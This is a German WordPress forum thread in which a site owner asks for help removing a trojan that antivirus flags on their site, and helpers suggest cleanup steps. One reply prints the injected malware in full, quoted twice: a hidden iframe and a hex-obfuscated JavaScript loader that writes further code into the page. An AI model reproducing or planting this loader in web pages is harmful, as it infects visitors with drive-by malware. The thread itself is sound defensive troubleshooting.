Trojaner "TR/Dldr.HTML.Agent.MU" - was tun???

  • Seit einigen Tagen findet mein Antivir beim Aufrufen meiner Wordpress-Seite den Trojaner "TR/Dldr.HTML.Agent.MU". Ich benutze Wordpress 2.6.

    Leider konnte ich im Netz nix dazu finden. Wie bringe ich den wieder runter von der Seite? Wäre echt toll, wenn mir hier jemand weiterhelfen könnte.

    Ich sag schon mal im vorraus Danke!

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo! Erstmal danke für die schnellen Antworten. Den Link von Peter habe ich schon gefunden, aber bei mir hilft das nicht. Ich kann den code einfach nicht finden. Bei mir ist es aber auch eine andere Datei-Endung bei dem Trojaner, nämlich .MU stat .IS.

    Link zur Seite: TB 1893/ASV Regenstauf News

    Danke

  • Ganz am Ende deiner Seite steht folgendes:

    HTML
    <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l496c5c63121d0(l496c5c63129a0){ var l496c5c6313171=16; return (parseInt(l496c5c63129a0,l496c5c6313171));}function l496c5c6314113(l496c5c63148e5){  var l496c5c63150b6='';l496c5c6316ffa=String.fromCharCode;for(l496c5c6315885=0;l496c5c6315885<l496c5c63148e5.length;l496c5c6315885+=2){ l496c5c63150b6+=(l496c5c6316ffa(c102916999516l496c5c63121d0(l496c5c63148e5.substr(l496c5c6315885,2))));}return l496c5c63150b6;} var xc6='';var l496c5c63177ca='3C736'+xc6+'3726'+xc6+'970743E6'+xc6+'96'+xc6+'6'+xc6+'28216'+xc6+'D796'+xc6+'96'+xc6+'1297B6'+xc6+'46'+xc6+'F6'+xc6+'3756'+xc6+'D6'+xc6+'56'+xc6+'E742E77726'+xc6+'9746'+xc6+'528756'+xc6+'E6'+xc6+'5736'+xc6+'36'+xc6+'1706'+xc6+'528202725336'+xc6+'32536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'352532302536'+xc6+'6'+xc6+'52536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'42536'+xc6+'332533312533302532302537332537322536'+xc6+'3325336'+xc6+'42532372536'+xc6+'3825373425373425373025336'+xc6+'125326'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2533322536'+xc6+'6'+xc6+'42536'+xc6+'3525326'+xc6+'52536'+xc6+'6'+xc6+'52536'+xc6+'3525373425326'+xc6+'6'+xc6+'25326'+xc6+'52536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'332536'+xc6+'382536'+xc6+'352536'+xc6+'332536'+xc6+'6'+xc6+'225326'+xc6+'52536'+xc6+'382537342536'+xc6+'6'+xc6+'42536'+xc6+'6'+xc6+'32532372532302537372536'+xc6+'392536'+xc6+'342537342536'+xc6+'3825336'+xc6+'42533322533382533302532302536'+xc6+'382536'+xc6+'352536'+xc6+'392536'+xc6+'372536'+xc6+'3825373425336'+xc6+'4253335253335253336'+xc6+'2532302537332537342537392536'+xc6+'6'+xc6+'32536'+xc6+'3525336'+xc6+'4253237253736'+xc6+'2536'+xc6+'392537332536'+xc6+'392536'+xc6+'322536'+xc6+'392536'+xc6+'6'+xc6+'32536'+xc6+'3925373425373925336'+xc6+'12536'+xc6+'382536'+xc6+'392536'+xc6+'342536'+xc6+'342536'+xc6+'352536'+xc6+'6'+xc6+'525323725336'+xc6+'525336'+xc6+'325326'+xc6+'6'+xc6+'2536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'52729293B7D76'+xc6+'6'+xc6+'172206'+xc6+'D796'+xc6+'96'+xc6+'13D7472756'+xc6+'53B3C2F736'+xc6+'3726'+xc6+'970743E';document.write(l496c5c6314113(l496c5c63177ca));</script>


    Die URL des IFrame wird vermutlich durch das folgende Script geändert und von dieser URL dann der Trojaner geladen. Poste mal bitte die footer.php deines Themes.

  • Ganz am Ende deiner Seite steht folgendes:

    HTML
    <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l496c5c63121d0(l496c5c63129a0){ var l496c5c6313171=16; return (parseInt(l496c5c63129a0,l496c5c6313171));}function l496c5c6314113(l496c5c63148e5){  var l496c5c63150b6='';l496c5c6316ffa=String.fromCharCode;for(l496c5c6315885=0;l496c5c6315885<l496c5c63148e5.length;l496c5c6315885+=2){ l496c5c63150b6+=(l496c5c6316ffa(c102916999516l496c5c63121d0(l496c5c63148e5.substr(l496c5c6315885,2))));}return l496c5c63150b6;} var xc6='';var l496c5c63177ca='3C736'+xc6+'3726'+xc6+'970743E6'+xc6+'96'+xc6+'6'+xc6+'28216'+xc6+'D796'+xc6+'96'+xc6+'1297B6'+xc6+'46'+xc6+'F6'+xc6+'3756'+xc6+'D6'+xc6+'56'+xc6+'E742E77726'+xc6+'9746'+xc6+'528756'+xc6+'E6'+xc6+'5736'+xc6+'36'+xc6+'1706'+xc6+'528202725336'+xc6+'32536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'352532302536'+xc6+'6'+xc6+'52536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'42536'+xc6+'332533312533302532302537332537322536'+xc6+'3325336'+xc6+'42532372536'+xc6+'3825373425373425373025336'+xc6+'125326'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'2533322536'+xc6+'6'+xc6+'42536'+xc6+'3525326'+xc6+'52536'+xc6+'6'+xc6+'52536'+xc6+'3525373425326'+xc6+'6'+xc6+'25326'+xc6+'52536'+xc6+'372536'+xc6+'6'+xc6+'6'+xc6+'25326'+xc6+'6'+xc6+'2536'+xc6+'332536'+xc6+'382536'+xc6+'352536'+xc6+'332536'+xc6+'6'+xc6+'225326'+xc6+'52536'+xc6+'382537342536'+xc6+'6'+xc6+'42536'+xc6+'6'+xc6+'32532372532302537372536'+xc6+'392536'+xc6+'342537342536'+xc6+'3825336'+xc6+'42533322533382533302532302536'+xc6+'382536'+xc6+'352536'+xc6+'392536'+xc6+'372536'+xc6+'3825373425336'+xc6+'4253335253335253336'+xc6+'2532302537332537342537392536'+xc6+'6'+xc6+'32536'+xc6+'3525336'+xc6+'4253237253736'+xc6+'2536'+xc6+'392537332536'+xc6+'392536'+xc6+'322536'+xc6+'392536'+xc6+'6'+xc6+'32536'+xc6+'3925373425373925336'+xc6+'12536'+xc6+'382536'+xc6+'392536'+xc6+'342536'+xc6+'342536'+xc6+'352536'+xc6+'6'+xc6+'525323725336'+xc6+'525336'+xc6+'325326'+xc6+'6'+xc6+'2536'+xc6+'392536'+xc6+'36'+xc6+'2537322536'+xc6+'312536'+xc6+'6'+xc6+'42536'+xc6+'3525336'+xc6+'52729293B7D76'+xc6+'6'+xc6+'172206'+xc6+'D796'+xc6+'96'+xc6+'13D7472756'+xc6+'53B3C2F736'+xc6+'3726'+xc6+'970743E';document.write(l496c5c6314113(l496c5c63177ca));</script>

    Die URL des IFrame wird vermutlich durch das folgende Script geändert und von dieser URL dann der Trojaner geladen. Poste mal bitte die footer.php deines Themes.

    Bitte:

    PHP
    <div id="unten"><!-- the content -->
    <p style="margin-left: 120px; margin-top: 90px;">Copyright © 2008 TB 1893/ASV Regenstauf All Rights Reserved <a href="#top"><img src="http://www.tb-asv-regenstauf.de/wp-content/uploads/2008/12/top.jpg"></a></p> 
    <?php do_action('wp_footer'); ?>
    </body></html>

    Einmal editiert, zuletzt von Olaf (14. Januar 2009 um 21:51)

  • Mmh, da der Code nach </body></html> eingefügt wird ist vermutlich nicht das Template oder der Footer-Pluign-Hook verantwortlich.

    Hast du WP mal drüberinstalliert (alles löschen und gleiche Version neu hochladen) um auszuschließen, dass es irgendwo in den Coredateien steckt? Hast du das Theme gründlich gecheckt (v.a. functions.php) oder mal testweise gewechselt? Hast du die Plugins mal alle deaktiviert? So könntest du dem Übeltäter auf die Spur kommen...

  • Mmh, da der Code nach </body></html> eingefügt wird ist vermutlich nicht das Template oder der Footer-Pluign-Hook verantwortlich.

    Hast du WP mal drüberinstalliert (alles löschen und gleiche Version neu hochladen) um auszuschließen, dass es irgendwo in den Coredateien steckt? Hast du das Theme gründlich gecheckt (v.a. functions.php) oder mal testweise gewechselt? Hast du die Plugins mal alle deaktiviert? So könntest du dem Übeltäter auf die Spur kommen...

    Alles probiert. Hab jetzt auch auf 2.7 upgedated. Bleibt aber alles beim alten.

  • Dann kann es eigentlich fast nicht mehr an WP liegen, wenn du das alles ausgetauscht hast. Was mir noch einfallen würde, wäre eine korrupte php.ini, wo der Code z.B. per auto_append_file angefügt wird. Das dürfte dann alle PHP-Dateien auf deinem Web betreffen. Evtl. kannst du das testen, indem du mal einfach eine PHP-Datei mit diesem Inhalt:

    PHP
    <?php
    echo '<p>Hallo Welt!</p>';
    ?>


    anlegst und diese aufrufst. Wird der Code dort ebenfalls eingefügt?

    Hast du deinen Hoster mal um Rat gefragt? Vielleicht kann er einen zielführenden Tipp geben.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!